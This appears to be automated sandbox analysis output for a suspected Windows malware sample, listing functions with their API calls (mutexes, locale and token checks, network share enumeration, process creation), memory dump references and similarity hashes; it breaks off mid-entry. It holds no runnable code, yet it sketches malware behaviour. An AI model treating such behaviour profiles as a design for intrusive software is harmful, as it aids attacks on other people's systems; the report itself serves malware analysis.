      Function 000D4D68 Relevance: 6.0, APIs: 4, Instructions: 39threadsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNEL32(00000000,00000000,000D4B85,00000000,00000000,00000000), ref: 000D4D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4DA7
      • CloseHandle.KERNEL32(00000000,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4DB1
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:
      • API String ID: 478055939-0
      • Opcode ID: fa44839932f409ae550837f8747d4720e99b7ac07f1beef5d02f08eafc70facb
      • Instruction ID: 4930e6cbc76611aa85661d86a583bc6b826b1a7789a28a8084034bdfe1ef0d40
      • Opcode Fuzzy Hash: fa44839932f409ae550837f8747d4720e99b7ac07f1beef5d02f08eafc70facb
      • Instruction Fuzzy Hash: 95F0FE75602224BB9B219B65DD4DCFF7FFDEF86B617110017F805D2210D7789A0196B2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D349E Relevance: 6.0, APIs: 4, Instructions: 33synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 000D34B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D34C3
      • EnterCriticalSection.KERNEL32(?), ref: 000D34CA
        • Part of subcall function 000D33F3: SetEvent.KERNEL32(00000004), ref: 000D3459
        • Part of subcall function 000D33F3: ResetEvent.KERNEL32(00000000), ref: 000D3462
      • LeaveCriticalSection.KERNEL32(?), ref: 000D34DD
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:
      • API String ID: 3328302011-0
      • Opcode ID: ede8264d7123f9073be1b389d2338900311fe9b6f3a0d34e46d77b4a5fb57007
      • Instruction ID: 6052dded317e260df1e5521e2b560cd0c88adeb04b96e41229530f38c058447f
      • Opcode Fuzzy Hash: ede8264d7123f9073be1b389d2338900311fe9b6f3a0d34e46d77b4a5fb57007
      • Instruction Fuzzy Hash: 0DF0A772605305FBD7015B69ED44D8ABFACEF063707104113F90692261DB79EE4487B2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D53E5 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(000D1D91,000D1D81,00000000,00000000,000D5906,?,000D1D81,00000000,?,?,?,?), ref: 000D53EE
      • SetEvent.KERNEL32(74FF2274,?,000D1D81,00000000,?,?,?,?), ref: 000D5404
      • SetEvent.KERNEL32(FF102474,?,000D1D81,00000000,?,?,?,?), ref: 000D5416
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D541F
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:
      • API String ID: 2034477713-0
      • Opcode ID: b74b96f9be5e4922ed6fa974ab87a8d906205041d47923f10138840d88c3831e
      • Instruction ID: 082ff4182daed6989c8b7bc6649c0dc15a29567b1fda10c4d894d0eaa00f4a71
      • Opcode Fuzzy Hash: b74b96f9be5e4922ed6fa974ab87a8d906205041d47923f10138840d88c3831e
      • Instruction Fuzzy Hash: E8F01C72201B10ABD7205F68DC44C56BBE9EF553A73214A2BED92D32A4C731EC818A72
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D2161 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147sleepCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 000D21D5
      • Sleep.KERNEL32(00002710), ref: 000D2297
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-
      • API String ID: 2761037825-4184602625
      • Opcode ID: 2cefae943cfb970e4957908ed698e9177f7f271c06083e3148ce22e028d39471
      • Instruction ID: 4d08e2a8198c3618264cd7cdc46faa9f947d7017ca315d51afd6aa19bdd0cc67
      • Opcode Fuzzy Hash: 2cefae943cfb970e4957908ed698e9177f7f271c06083e3148ce22e028d39471
      • Instruction Fuzzy Hash: CC418372A00308BAEB11ABA4DC46FEF77BCAF51751F200017FA04A62C3DA709F5486B5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D2084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86sharenetworkCOMMON
      Download Yara Rule
      APIs
      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 000D20F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D2126
        • Part of subcall function 000D1E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 000D1E66
        • Part of subcall function 000D1E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 000D1E83
        • Part of subcall function 000D1E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 000D2046
        • Part of subcall function 000D1E10: WNetCloseEnum.MPR(?), ref: 000D205E
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: abf68575c731af063cffe02b6caf7cec889decf1f8e71230d1d77e4afdc1d7a6
      • Instruction ID: 2e5790d2426149838747d79e5fe9d8750575bfb3569dc8aab1fcad6156fbd9d6
      • Opcode Fuzzy Hash: abf68575c731af063cffe02b6caf7cec889decf1f8e71230d1d77e4afdc1d7a6
      • Instruction Fuzzy Hash: B4214F72508305AFE700DFA9CC8599BB7EDFF49714F00492EFA94C6251E771E6188B92
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D24C2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30threadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 000D24F8
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocCreateProcessThread
      • String ID: $-"$"
      • API String ID: 490627656-2688294569
      • Opcode ID: 0be8e975c972fd695682ec75f4029ea86d211405e0f871e0de410b55f4b7f94a
      • Instruction ID: f894673c19b1562c32577b2029975ad8bd6c51f4faead11eab22dffdcd8ccedd
      • Opcode Fuzzy Hash: 0be8e975c972fd695682ec75f4029ea86d211405e0f871e0de410b55f4b7f94a
      • Instruction Fuzzy Hash: 69F01CB1214609AFCB08CF55E845C5B7BE9EF88310B14C66AF90C8B225D234D8518BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Executed Functions

      Function 002029F5 Relevance: 26.0, APIs: 17, Instructions: 460sleepsynchronizationthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 2029f5-202a41 1 202a47-202a5d call 2085d9 0->1 2 202f9e-202fa6 0->2 1->2 5 202a63-202a7e call 2062a6 1->5 5->2 8 202a84-202aa4 call 206347 GetTickCount call 2094fe 5->8 13 202ad4-202aeb call 202876 call 206347 8->13 14 202aa6-202abc GetLocaleInfoW 8->14 25 202b01-202b17 call 2039da call 203e39 13->25 26 202aed-202af1 call 20271b 13->26 15 202aca 14->15 16 202abe-202ac8 14->16 18 202acc-202ace 15->18 16->18 18->13 20 202ef0-202ef6 18->20 22 202ef8 call 20597e 20->22 23 202efd 20->23 22->23 28 202f01-202f07 23->28 50 202b19 25->50 51 202b1d-202b31 call 203772 25->51 35 202af6-202afa 26->35 31 202f09 call 20597e 28->31 32 202f0e-202f10 28->32 31->32 33 202f12-202f1f EnterCriticalSection 32->33 34 202f45-202f5f call 202876 call 2039b7 32->34 38 202f21-202f22 CloseHandle 33->38 39 202f28-202f2e 33->39 55 202f61-202f65 call 201870 34->55 56 202f6a-202f6e 34->56 35->25 40 202afc call 202876 35->40 38->39 43 202f30-202f31 CloseHandle 39->43 44 202f37-202f44 DeleteCriticalSection call 2090a1 39->44 40->25 43->44 44->34 50->51 51->20 59 202b37-202b49 call 2028ca call 205930 51->59 55->56 60 202f70-202f74 call 201870 56->60 61 202f79-202f7d 56->61 59->28 70 202b4f-202b5a call 205930 59->70 60->61 63 202f93-202f99 call 206274 61->63 64 202f7f-202f8d ReleaseMutex CloseHandle 61->64 63->2 64->63 70->20 73 202b60-202b6c 70->73 74 202be6-202bef call 204ea5 73->74 75 202b6e-202b78 call 204ea5 73->75 80 202bf1-202bf3 call 204f7a 74->80 81 202c62-202c66 74->81 75->20 82 202b7e-202b87 call 204f7a 75->82 88 202bf8-202bfb 80->88 84 202c98-202ca4 call 204dbe 81->84 85 202c68-202c72 call 204f7a 81->85 94 202ba3-202baa 82->94 95 202b89-202b8d 82->95 96 202ca6-202caa 84->96 97 202ccc-202d00 call 203c7a call 201894 call 203c7a call 201894 84->97 102 202c74-202c7b call 20489e 85->102 103 202c88-202c8c 85->103 88->20 92 202c01-202c08 88->92 100 202c0a-202c0e 92->100 101 202c1d-202c20 92->101 98 202bc0-202bc3 94->98 99 202bac-202bb0 94->99 95->94 104 202b8f-202b96 call 2049d3 95->104 96->97 105 202cac-202cca call 203c7a call 201894 96->105 142 202d04-202d09 97->142 98->103 110 202bc9-202bcd 98->110 106 202bb2-202bb6 99->106 107 202bb8-202bbf call 204dbe 99->107 100->101 108 202c10-202c17 call 20242f 100->108 101->20 112 202c26-202c2a 101->112 102->103 129 202c7d-202c82 Sleep 102->129 103->84 113 202c8e-202c93 call 202946 call 201236 103->113 104->94 125 202b98-202b9d Sleep 104->125 105->142 106->98 106->107 107->98 108->20 108->101 120 202bd9-202be1 call 204dbe 110->120 121 202bcf-202bd3 110->121 112->20 123 202c30-202c3a call 204944 112->123 113->84 120->103 121->103 121->120 123->20 141 202c40-202c4b call 204f7a 123->141 125->94 129->103 141->20 149 202c51-202c5b Sleep 141->149 142->20 147 202d0f-202d30 call 2024c2 142->147 153 202d32-202d39 147->153 154 202d3b 147->154 149->141 151 202c5d 149->151 151->20 155 202d3d-202d41 153->155 154->155 156 202e17-202e35 call 2024c2 155->156 157 202d47-202d64 CreateThread 155->157 167 202e39-202e3d 156->167 159 202d6a-202d73 157->159 160 202eec-202eee 157->160 163 202da3-202dc7 call 2024c2 159->163 164 202d75-202d9c call 2024c2 159->164 160->20 161 202ee1-202ee5 160->161 166 202ee6 CloseHandle 161->166 173 202dc9-202dca 163->173 174 202dce-202e0e call 2024c2 * 2 163->174 164->163 175 202d9e-202d9f 164->175 166->160 170 202e4b-202e56 call 205962 167->170 171 202e3f-202e45 WaitForSingleObject 167->171 179 202e97-202e9b 170->179 180 202e58-202e5c 170->180 171->170 173->174 174->167 195 202e10-202e15 174->195 175->163 182 202e9d-202eba EnterCriticalSection LeaveCriticalSection 179->182 183 202ebe-202ec0 179->183 184 202e64 call 201000 180->184 185 202e5e-202e62 180->185 182->183 187 202ec2-202ecf WaitForMultipleObjects 183->187 188 202ed5-202ed9 183->188 189 202e69-202e6d 184->189 185->184 185->189 187->188 188->160 192 202edb-202edf 188->192 193 202e74-202e7b 189->193 194 202e6f call 202946 189->194 192->166 193->179 197 202e7d-202e81 193->197 194->193 195->167 198 202e83-202e87 197->198 199 202e89-202e8d 197->199 198->179 198->199 199->179 200 202e8f-202e96 call 204dbe 199->200 200->179
      APIs
      • GetTickCount.KERNEL32 ref: 00202A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00202AB4
      • Sleep.KERNEL32(00001388), ref: 00202B9D
      • Sleep.KERNEL32(00000064), ref: 00202C53
      • Sleep.KERNEL32(00001388), ref: 00202C82
      • CreateThread.KERNEL32(00000000,00000000,0020239A,?,00000000,00000000), ref: 00202D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00202E45
        • Part of subcall function 00204F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
        • Part of subcall function 00204F7A: CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      • EnterCriticalSection.KERNEL32(?), ref: 00202EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 00202EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00202ECF
      • CloseHandle.KERNEL32(?), ref: 00202EE6
        • Part of subcall function 0020489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00204908
        • Part of subcall function 0020489E: CloseHandle.KERNEL32(?), ref: 0020491E
        • Part of subcall function 0020489E: CloseHandle.KERNEL32(?), ref: 00204923
      • EnterCriticalSection.KERNEL32(?), ref: 00202F13
      • CloseHandle.KERNEL32(?), ref: 00202F22
      • CloseHandle.KERNEL32(?), ref: 00202F31
      • DeleteCriticalSection.KERNEL32(?), ref: 00202F38
      • ReleaseMutex.KERNEL32(?), ref: 00202F83
      • CloseHandle.KERNEL32(?), ref: 00202F8D
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 59d87423b41de68854fc1906cfe4fbea93fc60140ece3ebdc6b5b13815002ee9
      • Instruction ID: 0a008a62ec60bc33101834281e30b44b2cb86788a986e11cfe6a2532b4650b1a
      • Opcode Fuzzy Hash: 59d87423b41de68854fc1906cfe4fbea93fc60140ece3ebdc6b5b13815002ee9
      • Instruction Fuzzy Hash: DFF1A172528343EFDB20AF64D889A1EB7E5AF84710F54092FF684921D3DB70DD688B52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020271B Relevance: 9.1, APIs: 6, Instructions: 134fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 203 20271b-202751 call 209041 * 2 208 202836-202839 203->208 209 202757-202759 203->209 210 202844-202847 208->210 212 20283b-202843 call 2090a1 208->212 209->210 211 20275f-202768 call 205b20 209->211 213 202852-202855 210->213 214 202849-202851 call 2090a1 210->214 211->208 226 20276e-202789 call 2059f1 211->226 212->210 219 202860-202866 213->219 220 202857-20285f call 2090a1 213->220 214->213 224 202871-202875 219->224 225 202868-202870 call 2090a1 219->225 220->219 225->224 226->208 232 20278f-2027a7 CreateFileW 226->232 232->208 233 2027ad-2027d7 SetFilePointer call 209041 * 2 232->233 238 2027d9-2027db 233->238 239 20282d-202830 CloseHandle 233->239 238->239 240 2027dd-2027e7 SetFilePointer 238->240 239->208 240->239 241 2027e9-2027fd ReadFile 240->241 241->239 242 2027ff-202802 241->242 242->239 243 202804-20282a MultiByteToWideChar call 202504 242->243 243->239
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6), ref: 0020279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 002027F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000), ref: 00202813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00202AF6,00000000,?), ref: 00202830
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 2550576714-0
      • Opcode ID: f5f2cac03f5d45a0e315196062a5ac58de961294a84a38882fa4634be194b0e7
      • Instruction ID: f3e7af4ebb6ad435612f0a02f9f8598461719f58963887600bbf7e6d5bed0c14
      • Opcode Fuzzy Hash: f5f2cac03f5d45a0e315196062a5ac58de961294a84a38882fa4634be194b0e7
      • Instruction Fuzzy Hash: 86418175D10319FBDB216FA59C89DAFBBB9EF85710F20412AF500A10D3E6314EA5CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203E39 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 246 203e39-203e4d GetVersion 247 203e52-203e67 GetCurrentProcess OpenProcessToken 246->247 248 203e4f-203e50 246->248 250 203e69-203e85 GetTokenInformation 247->250 251 203e8a-203e8e 247->251 249 203e99-203e9d 248->249 250->251 252 203e87 250->252 251->249 253 203e90-203e93 FindCloseChangeNotification 251->253 252->251 253->249
      APIs
      • GetVersion.KERNEL32(?,00202B0D), ref: 00203E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 00203E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 00203E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00203E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00203E93
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: 3795785f40c103a975d067e81bec8bad4fa0d06509cbfe50c7c9570aaa0c625f
      • Instruction ID: 049808652ab30ccf858a3e2c211cd5ab6be4a25257aba9c5a094771c202f1e71
      • Opcode Fuzzy Hash: 3795785f40c103a975d067e81bec8bad4fa0d06509cbfe50c7c9570aaa0c625f
      • Instruction Fuzzy Hash: EDF0F672910318EBDB11DBA4EC09B9EB77DAF04701F50426AE606E2092D7709B549B91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204EA5 Relevance: 6.1, APIs: 4, Instructions: 83synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 254 204ea5-204f15 call 203c7a call 206347 call 205a46 * 2 call 205fe7 265 204f17-204f28 OpenMutexW 254->265 266 204f4d 254->266 268 204f39-204f49 WaitForSingleObject 265->268 269 204f2a-204f37 CreateMutexW 265->269 267 204f4f-204f53 266->267 270 204f62-204f79 call 2039da * 2 267->270 272 204f55-204f5e CloseHandle 267->272 268->270 271 204f4b 268->271 269->268 273 204f60 269->273 271->267 272->270 273->270
      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00204F1E
      • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00204F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00204F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00204F56
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: 79723d3f52d3228d3df04d38994771a770448921f2d468d16c1216eaea26baa0
      • Instruction ID: 0bf99c5de806daba4d8a46e73c3b91d3f6c1e2b643e089e4537e9eb889c3895c
      • Opcode Fuzzy Hash: 79723d3f52d3228d3df04d38994771a770448921f2d468d16c1216eaea26baa0
      • Instruction Fuzzy Hash: C821B2B5A1030DAFCB10AFA0DC8999DBBF9FB84344F608439F645E7282DA709D658F10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204F7A Relevance: 3.0, APIs: 2, Instructions: 20synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 278 204f7a-204f86 call 204ea5 280 204f8b-204f90 278->280 281 204f92-204f9e ReleaseMutex CloseHandle 280->281 282 204fa4-204fa8 280->282 281->282
      APIs
        • Part of subcall function 00204EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00204F1E
        • Part of subcall function 00204EA5: CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00204F2D
        • Part of subcall function 00204EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00204F3C
        • Part of subcall function 00204EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00204F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
      • CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
